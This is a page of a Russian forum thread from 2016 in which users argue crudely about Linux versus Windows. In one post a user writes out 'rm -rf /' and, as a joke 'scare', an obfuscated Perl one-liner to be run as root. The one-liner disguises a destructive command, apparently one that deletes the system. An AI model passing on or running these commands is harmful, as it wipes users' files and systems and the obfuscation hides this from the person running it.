Топ 10 опасных заблуждений о Linux

[ Версия для печати ]
Добавить в Telegram Добавить в Twitter Добавить в Вконтакте Добавить в Одноклассники
Страницы: (40) « Первая ... 34 35 [36] 37 38 ... Последняя »  К последнему непрочитанному [ ОТВЕТИТЬ ] [ НОВАЯ ТЕМА ]
smashteam
3.11.2016 - 03:34
0
Статус: Offline

Зануда

MPR
прям одной буквой от предмета сообщения отличается Ваш ник) mbr не так уж и трудно победить при наличии навыков/знаний и софта под рукой)

[^]
dfatman
3.11.2016 - 03:56
1

Хохмач

Цитата (TenOClock @ 2.11.2016 - 13:41)
Цитата (techNICK @ 2.11.2016 - 09:26)
Цитата
Linux уважает приватность своих пользователей, а Windows шпионит
Цитата
Фонд элeктронных рубежей (EFF) выразил беспокойство по поводу негативных тенденций в развитии операционной системы Ubuntu. В частности, в последней вeрсии Ubuntu 12.10 появился ряд новых функций, некоторые из которых вызвали раздpажение у пользователей из-за нарушения базовых правил по защите пpиватной информации.

Халява она должна как-то оплачиваться. Так почему бы не показом целевой рекламы? smile.gif

Ну, и ещё немножко про "уважение приватности" можно глянуть по ссылке
Хоть инфа и 2013 года, но не думаю, что прям-таки отказались от таких действий

Более того и будут продолжать в том же духе. Это я не к тому что винда круче, это я к тому что у многих линуксоидов эльфийский взгляд на жисть.

Как они усирались что никсы - безопасны, а у сами много лет не замечали уязвимость heartbleed smile.gif

Ну и причем здесь Линукс? Уязвимость была в openssl и то, не во всех версиях.

[^]
sergyx
3.11.2016 - 04:03
2

Ярила

Цитата (smashteam @ 3.11.2016 - 02:30)
Цитата
в теме где в основном претензии про его удобство/неудобство?

так неудобство можно самому исправить, причем легко

дадад! Все настраивается! И легко!
А если после нескольких страниц срача выясняется, что все-таки не настраивается, то:
1-это мне не нужно
2-это не критично
3-используй вайн (внезапно!)
4-вас никто не заставляет пользоваться линуксом
5-а реши-ка задачку в своей винде
6-упс, решил, но зато винда костыльная
7-и вообще ты троль и не мешай нам танцевать попой тверк

bravo.gif

[^]
smashteam
3.11.2016 - 04:22
1

Зануда

Цитата
А если после нескольких страниц срача выясняется, что все-таки не настраивается, то:
1-это мне не нужно
2-это не критично

1-я юзаю железо на 100%
2-нет проблемы найти решение, иногда бывает приходится быть "первопроходцем" и находить решение в англоязычном сегменте инета) (что для меня траблы не составляет)
3-я вайн не юзал лет 10, хоть и уверен он может уже многое
4-в точку)
5-е есть решения и проще стороннего софта, нужны чуть более глубокие знания "реестра" винды)
6-костыли неизбежны
7- все мы тролли.
зы. я не танцую, только волосами трясу. но уже лысею и длинные давненько не ношу)

[^]
dfatman
3.11.2016 - 04:27
3

Хохмач

Цитата (proba @ 2.11.2016 - 16:36)
Цитата
Идешь снова в форумы и видишь что вот только на этой версии убунты эти команды надо по другому вводить,а вот на след уже как обычно.

Во, во, во! Самая мякотка! Стандартизации нет.

Какой стандартизации? blink.gif
Что это за команды? Как раз консольные команды везде одинаковые.
А если была попытка запустить не установленную программу, ну это да, Линукс виноват. bravo.gif

[^]
smashteam
3.11.2016 - 04:30
1

Зануда

Цитата
ну это да, Линукс виноват.

ну никак не разработчик) это Линус решил ядро всколыхнуть rofl.gif

[^]
dfatman
3.11.2016 - 04:52
-2

Хохмач

Цитата (Realist007 @ 2.11.2016 - 16:39)
Цитата (vodemarrr @ 2.11.2016 - 12:33)
Это вы ещё в раздел "тарифы" не заглядывали. С Линуксом и ЛибреОфисом хотя бы бесплатно можно потрахаться, а тут как минимум 1к рублей в год отдать надо, причём с неясными перспективами.

Вот это то, о чем я говорил... Они даже БЕСПЛАТНУЮ версию не в состоянии скачать....
Какой им нахуй линукс ??? gigi.gif
Люди просто не в состоянии использовать что-то новое, даже если оно лучше.

https://www.wps.com/office-free

Хуй знает. kosyak.gif
Ну вот поставил я бесплатную версию, сначала понравилась.
Открыл документ Ворд, вроде все здорово, но что-то не так. Точно! Не вижу разметку страницы (пробелы, абзацы, разрывы строк, хуе-мое). Нет этой кнопки, хотя у офиса она на первом экране в главных. Ладно, предположил, что помощь нам поможет.
Хуй там! Меня отправили в браузер на страницу help.wps.com. А эта ебаная страница - не открывается. Т.е. я без хелпа локального и в интернетиках не помогут мне. Помощь, сука, не идет с ним! bravo.gif
Взгрустнулось, снес нахуй.
Это пять минут, бесплатная версия. Чувствую я, дальше бы полезли косяки из всех щелей.
Вот и ВПС офис, блядь.

[^]
sergyx
3.11.2016 - 04:52
-1

Ярила

Цитата (smashteam @ 3.11.2016 - 03:22)
Цитата
1-это мне не нужно
2-это не критично

1-я юзаю железо на 100%
2-нет проблемы найти решение, иногда бывает приходится быть "первопроходцем" и находить решение в англоязычном сегменте инета) (что для меня траблы не составляет)
3-я вайн не юзал лет 10, хоть и уверен он может уже многое
4-в точку)
5-е есть решения и проще стороннего софта, нужны чуть более глубокие знания "реестра" винды)
6-костыли неизбежны
7- все мы тролли.
зы. я не танцую, только волосами трясу. но уже лысею и длинные давненько не ношу)

ну да, и вот мы уже не только костыльность винды обсуждаем в теме про линух, но и секретами волосатости (надеюсь, не жопы) делимся.
Какие угодно темы готовы обсуждать, только не обозначенную!

Через пару страниц и до обсуждения геморроя доберемся. И ладно бы еще до геморроя от работы с линуксом, хоть как-то по теме. Но нет, до натурального геморроя! cranky.gif

Цитата

согласен, +1 в пользу винды.
но требовать у тебя это решение я не буду, бесполезно.

Это сообщение отредактировал sergyx - 3.11.2016 - 05:22

[^]
dfatman
3.11.2016 - 05:05
2

Хохмач

Цитата (proba @ 2.11.2016 - 16:50)
Цитата
Человек примера как раз не привел, а написал в стиле "сопли и слезы". Что вводил, куда вводил? Инфы 0.

Я уже не помню. Было 2 года назад. Хотел как раз поставить несчастный принтер Canon. Помню что Debian тогда установил свежий. И ещё криво работали три звуковые карты. При каждой загрузке ОС, вывод звука был то на одну звуковуху, то на другую. По рэндому. Тоже не победил.
Пусть будут сопли. Разрешите лично к вам обратиться в следующий раз, когда надумаю поставить линукс.

Три звуковухи на одном компе? Да-да, Винда с ними ебанется также, на отличненько. У меня две, и то, постоянно норовит устройство вывода сменить.
В Линуксе это хоть гвоздем прибить можно.

[^]
dfatman
3.11.2016 - 05:08
0

Хохмач

Цитата (Realist007 @ 2.11.2016 - 16:55)
Цитата (Cromwell @ 2.11.2016 - 12:43)
Ну а то, что вы пытаетесь меня убедить, что одна их крупнейших и опытнейших компаний в мире (Microsoft) с кучей отличных программистов, колоссальным опытом разработки офисного ПО пишет настолько паршиво программы, что они аж в 50 раз больше при одинаковой функциональности - это вообще смешно. Никогда в жизни я в это не поверю.

Для того чтобы это понять, надо изучить архитектуру обоих ОС хотя бы немного.
Нам это преподавали в универе по предмету "операционные системы".
И в двух словах это не объяснишь. Гугли, читай, в инете информация есть в свободном доступе (если есть желание).

Но то что это так - это факт. И если ты не в курсе что такое архитектура и какая она, то не надо спорить в этих вопросах dont.gif

А насчет "отличных программистов" в МС, и как они завоевали рынок - просто почитай историю, почитай про вин95 - как она вываливалась в бсод прямо на презентации (это про лучших программистов), после чего уволили несколько тысяч программистов и т.д. Почитай кто писал ядро для вин-НТ (если вообще слышал про такую), а из нее потом пошла win-XP (первая более менее нормальная), из которой потом пошли вс остальные. Ты же вообще не в теме, но зато бля споришь с пеной у рта и еще че-то доказывать пытаешься... Ламеры бля. Жертва маркетинга, знаниями и опытом у тебя и не пахнет.

Да, и у кого они просто, тупо спиздили всю ветку НТ в самом начале. И как АйБиЭм их хуем перекрестила, потому как - все равно обосрутся.
И обсерались, и продолжают.

[^]
dfatman
3.11.2016 - 05:15
1

Хохмач

Цитата (techNICK @ 2.11.2016 - 16:58)
Realist007
Цитата
И в двух словах это не объяснишь. Гугли, читай, в инете информация есть в свободном доступе

Типичный ответ человека сообщества линуксоидов, который "с радостью поможет вам решить самую трудную задачу" gigi.gif

А ответ что, не верный? Курс лекций по архитектуре систем написать тут нужно было? А его кто-то читать будет?
Подъебка не защитана.

[^]
armadagrup
3.11.2016 - 05:17
0

Ярила

Убунта рулит!!
В сестры в хозяйстве 2 компа и 3 ламера 80 уровня. Пока стоял виндовс, раз в месяц я его переустанавливал, потому, что ухитрялись его запороть. Поставил Убунту и забыл когда касался их компов.

[^]
smashteam
3.11.2016 - 05:18
1

Зануда

Цитата
ну да, и вот мы уже не только костыльность винды обсуждаем в теме про линух, но и секретами волосатости (надеюсь, не жопы) делимся.
Какие угодно темы готовы обсуждать, только не обозначенную!

Через пару страниц и до обсуждения геморроя доберемся. И ладно бы еще до геморроя от работы с линуксом, хоть как-то по теме. Но нет, до натурального геморроя!

чой-та как всегда ближе к личностям переход идет) волосатость именно на голове и в причину наследственности) про гемор в работе с линуксом я готов дискутировать, ибо он если у кого-то и есть - так из-за своей лени. а про натуральный готов дискутировать сразу, как только меня это заденет лично)

[^]
dfatman
3.11.2016 - 05:27
0

Хохмач

Цитата (dvserg @ 2.11.2016 - 17:35)
Страшилка для линукса - rm -rf

Это не правильная страшилка, правильно rm -rf / или sudo rm -rf /
А еще она старая. Сейчас, сильно не в каждом Линухе так можно.

[^]
ТолстыйШмель
3.11.2016 - 05:30
-1

Похуист

Цитата (FilosofeM @ 2.11.2016 - 08:17)
6. Никто не пользуется Linux
Только одних фанатов Ubuntu больше 25 миллионов человек. Вам мало? Если да, то вам стоит узнать, что вы окажетесь среди элиты компьютерного мира, а элиты много не бывает.

Хаха, смищно. Илитарный клуп убунтоводов.

[^]
smashteam
3.11.2016 - 05:31
2

Зануда

Цитата

в винде же не страшно:
Отключите антивирус, запустите "этот" файл, в случае появления предупреждения добавьте в список исключения)

[^]
dfatman
3.11.2016 - 05:34
3

Хохмач

Цитата (fen498 @ 2.11.2016 - 18:07)
Записки КремлеБота. Windows и яблочная ось. Остальное для извращенцев. Ну и в последнее время конечно android и ios. Многие пользователи планшетов уже и забыли когда последний раз за комп садились. Ну не знаю я людей которые сами собрали себе комп и захотели поставить себе что либо кроме Windows. Ну и плюшек в виде установки всех программ нахаляву с WPI к примеру BELOFF. Касперского покупаю ну и ещё пару приблуд устанавливаю. А играть по полной программе можно в обще только на Windows. Правда нынче не дёшево. Самосборка нормального компа обойдётся как минимум в 150.000 рублей + монитор. Тысяч за 70.000 можно только утиль собрать. А какже Линукс? А ну его на х*й вместе с фан боями этой оси.

По моему, кто-то ебнулся. Какие 150? Что туда пихать на 150?! Пример конфигурации можно?

[^]
dfatman
3.11.2016 - 05:55
2

Хохмач

Цитата (smashteam @ 3.11.2016 - 09:31)
Цитата

в винде же не страшно:
Отключите антивирус, запустите "этот" файл, в случае появления предупреждения добавьте в список исключения)

А там всегда так, либо не страшно, либо похрену из-за незнания. Таких граждан и дос не спасет.
Вот настоящая медитативная страшилка, работает строго из-под рута, перл почти во всех дистрибах есть perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'

Это сообщение отредактировал dfatman - 3.11.2016 - 05:58

[^]
ysn
3.11.2016 - 07:02
2
Статус: Online

Ярила

Черт. Четвертый год на Минте.
Я домохозяйка?

Отправлено с мобильного клиента YAPik+

[^]
segagames
3.11.2016 - 07:33
-2

Ярила

Цитата
Быть в толпе цифровых рабов или перейти на Linux — выбирать вам.

Спасибо, но я лучше побуду "цифровым рабом", чем стану повседневно пользоваться поделием тысяч мартышек, которые зачастую противоречат друг другу. Линукс хорош только тем, что более устойчив к вирусным атакам, не более того. По удобству пользования - это как купить подержаный УАЗ. Вроде едет, но постоянно что то ломается и не работает. А иногда и не едет. Для серверных приложений - да, всё хорошо; для офисных - увольте, зоопарк зоопарком.

[^]
segagames
3.11.2016 - 08:04
1

Ярила

Цитата
Приемущество много в чем:
1. Открытый код
2. Свобода
3. Гибкая продуманная архитектура
4. Работает быстрее и меньше требований к железу
5. За открытыми системами будущее

1. Толку от открытого кода, если обычный пользователь в этом не разбирается? От слова СОВСЕМ.
2. Свобода чего? Слова? Дела? Или тупое американское слово "freedom", которое вообще в принципе ничего не подразумевает? Или в отм плане свобода, что хочешь - пользуйся, хочешь - нет? gigi.gif
3. Только если ты способен справиться с пунктом 1, в противном случае просто пустые слова, которые для рядового пользователя ничего не значат
4. Облегченная Ubuntu в виде Lubuntu более-менее нормально начинает работать только с 2 гигами оперативы и многоядерным процом (hyperthreading не в счет, он не помогает), в то время как та же самая 7 винда вполне нормально ворочается на гигабайте и одноядерном бюджетном целероне; про хрюшку вообще молчу, сидели на 512Мб с простеньким процом (даже не четвертом пне, а третьем) - и всё работало так, как пингвины могут только позавидовать.
5. Открытые системы - сплошной бардак, где у каждой программы/библиотеки/ядра по несколько десятков разработчиков, и каждый тянет в свою сторону, как лебедь, рак и щука. Коммерческая закрытая система - дали команду, каким должен быть результат - выполнили, и никакой самодеятельности. Так что открытые системы - исключительно для гиков и тех, кто не в состоянии купить нормальный адекватный коммерческий пакет - по идеологическим либо экономическим показателям. Или просто так у ваших "открытых систем" в наличие варианты подписки на техническую поддержку? Простите, но ценник у этой "поддержки" - дешевле дистрибутив легальной винды купить не единожды, и не иметь при этом головняков ни с контрагентами при обмене информацией, ни с сотрудниками, безуспешно пытающимися поправить "поплывшее" форматирование в том же ОпенОфисе

P.S. Банальная ситуация - девочка в Убунте/Лубунте пытается переключить язык стандартной (настроенной и привычной) комбинацией ALt+Shift, по досадной случайности промахивается мимо альта и попадает вместо него на кнопку КАЛЬКУЛЯТОРА(!!!) (да, есть такие вот идиотские клавиатуры), и причем повторяется это неоднократно (механическая память, бывает). Что имеем в итоге? В итоге имеем комп, который в принципе не реагирует адекватно на обычные пользовательские телодвижения по исправлению ситуации, и зовут либо админа, либо просто выключают/перезагружают комп кнопкой (а как же несохраненные данные? о, ужас). Проблема решается заменой клавиатуры на стандартную 101-key. У вас много свободного времени, чтобы разбираться с корнями таких проблем? Да вы, батенька, наверное из той же породы, что и 1С-ники (сейчас ведь и они шпалами закидают, как пить дать) - работаете ради того, чтобы создавать новую работу, а не ради результата bravo.gif

P.P.S.
Цитата
Запускайте Photoshop в Wine! Только и всего

Равносильно призывам "Ссыте в раковину - там тоже есть слив в канализацию", "Готовьте суп в чайнике - там тоже вода закипает", "Ешьте овощи вместо мяса - там тоже есть калории" moderator.gif

Это сообщение отредактировал segagames - 3.11.2016 - 08:22

[^]
pilligrimm01
3.11.2016 - 08:13
2

Приколист

Цитата (Cryer @ 2.11.2016 - 14:47)
Цитата (pilligrimm01 @ 2.11.2016 - 14:42)
Если линукс такой хороший, то почему он занимает всего 2-3% ПК? Наверное по причинам указанным выше: 1. отсутствие привычных удобных программ, либо их замена кривыми аналогами; 2. геморой с драйверами не включенными в диструбутив; 3. не всякое видео "правильно" воспроизводится в линуксе, соответственно геморрой с кодеками никто не отменял; 4. Поставить программу из исходников - геморой для начинающего пользователя, у меня ни разу не получилось; 5. отсутствие игр как класс (нафига компьютер нужен дома?); 6. по каждому вопросу касаемой работы и настройки системы нужно вкуривать по несколько часов на различных форумах... Иными словами линукс узкоспециализированная ОС для серверов, клиентов и т.д. и т.п., а еще им пользуются узкоспециализированные специалисты коих 2-3%. Обыкновенному пользователю, которому кроме соцсетей и интернета нужно поиграть или поработать дома с различными сложными таблицами (опен-либра офисы здесь нервно курят в сторонке) линь вообще не вариант!

Линукс - он как бы везде, куда не плюнь. =) В Станках на заводе, в БК автомобилей. В телефонах - везде. =)

Откройте глаза и прочитайте мой пост еще раз! Я говорил о линуксе на ПК! А то, что он узко специализирован и устанавливается во всякого рода чайники и кофеварки - так он и настраивается узкоспециализированными специалистами! Касаемо смартфонов - таки да, но JAVA которая запускается в лине это все же не линь! ЗЫ: не айтишник.

Это сообщение отредактировал pilligrimm01 - 3.11.2016 - 08:52

[^]
Tektone
3.11.2016 - 08:31
0

Ярила

Цитата (awolfman @ 2.11.2016 - 10:35)
Цитата (Tektone @ 2.11.2016 - 10:16)
а какой аналог indesign на Linux?

Scribus.

Спасибо за инфу. Попробую функционал.
Вот только конвертнуть документ из indd нельзя. А я в издательстве работаю. Весь архив: индиз.

Нашел только совет как через EPS открывать, но это изврат.

Это сообщение отредактировал Tektone - 3.11.2016 - 08:34

[^]
segagames
3.11.2016 - 08:45
-1

Ярила

Цитата
а какой аналог indesign на Linux

Какой такой Indesign на линухе? Только LaTeX rulez.gif
Сцуко, ну вот к чему такую аббревиатуру придумали, что сразу гондоны вспоминаются? gigi.gif

[^]
АзъЕсмь
3.11.2016 - 08:45
0

:-)

Гы. Вчера поставил себе минт на старый HDD. Вроде ничего, установился. Интернет даже поймал через USB wi-fi. все вроде работает, усрацца можно от радости. Загорелось мне потом установить на него мессенджер один. Ставлю вайн, запускаю. Вроде заходит. Но тут же вылетает. Хуй с ним, ставлю на виртуальную машину XP. Все норм, установилась с диска, все как есть. Запускаю снова эту ебучую общалку, скачивается, вроде всё. Снова пытаюсь зайти - вылетает. Ну вот на хуй этот линукс нужен с такими танцами? Виндовый офис даже как-то пропало желание ставить.
Сейчас кто-то скажет, вот типа заморачиваешься с этим мессенджером, нах он нужен. сразу отпишу таким людям: я если ставлю ось, то мне бы желательно юзать ее в полной мере с минимальным гемором. А линукс это один большой гемор.
Также была нужда в установке .apk приложений. В винде проще простого, NOX поставил и дальше без проблем. В линухе ТАКАЯ ебля с этих хромом, пакетами, установками без гарантии что оно корректно работать будет. кому интересно, погуглите на эту тему. Вот нахуй оно надо всё это?
А так-то да, в нете на порнуху теребонькать не опасаясь вирусов и калькулятор запустить - сойдет.

[^]
Понравился пост? Еще больше интересного в Телеграм-канале ЯПлакалъ!
Только зарегистрированные и авторизованные пользователи могут оставлять комментарии. Авторизуйтесь, пожалуйста, или зарегистрируйтесь, если не зарегистрированы.
1 Пользователей читают эту тему (1 Гостей и 0 Скрытых Пользователей) Просмотры темы: 72686
0 Пользователей:
Страницы: (40) « Первая ... 34 35 [36] 37 38 ... Последняя » [ ОТВЕТИТЬ ] [ НОВАЯ ТЕМА ]

Активные темы

Наверх